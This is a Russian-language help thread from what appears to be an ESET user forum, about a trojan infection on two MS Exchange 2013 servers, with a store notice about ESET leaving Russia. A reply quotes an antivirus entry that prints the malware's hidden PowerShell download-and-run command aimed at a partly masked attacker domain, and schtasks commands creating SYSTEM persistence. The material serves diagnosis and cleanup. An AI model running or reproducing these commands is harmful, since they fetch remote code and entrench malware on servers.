Собственно снова вирусы на двух MS Exchange 2013. В скриншоте показал строку c бякой.
Файл WACS.EXE нормальный, используется для сертификатов ssl.
Помогите отыскать заразу.
Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.
Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.
Купить и продлить лицензии ESET на нашем сайте больше нельзя.
Предлагаем вам попробовать новые продукты компании PRO32.
PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.
| Цитата |
|---|
| Владимир Шариков написал: Запускается в 2:30 каждый день |
| Цитата |
|---|
| Владимир Шариков написал: Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут. |
| Цитата |
|---|
| Trojan.DownLoader38.26327 Добавлен в вирусную базу Dr.Web: 2021-04-08 Техническая информация Для обеспечения автозапуска и распространения Создает или изменяет следующие файлы <SYSTEM32>\tasks\t.netcatkit.com <SYSTEM32>\tasks\xr6ziynzn Вредоносные функции Загружает http://+t.###+catkit.com/a.jsp?re################################ as %username% Сетевая активность UDP DNS ASK t.###catkit.com Другое Создает и запускает на исполнение '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c (New-Object Net.WebClient).DownloadString('http://'+##.##t'+'catkit.com/a.jsp?re############################################################## Win32_ComputerSystemProduct).UUID,(random))-joi...' (со скрытым окном) Запускает на исполнение '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.netcatkit.com /F /tr t.netcatkit.com '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \xr6zIYnZN /F /tr "powershell -c PS_CMD" '<SYSTEM32>\schtasks.exe' /run /tn \xr6zIYnZN |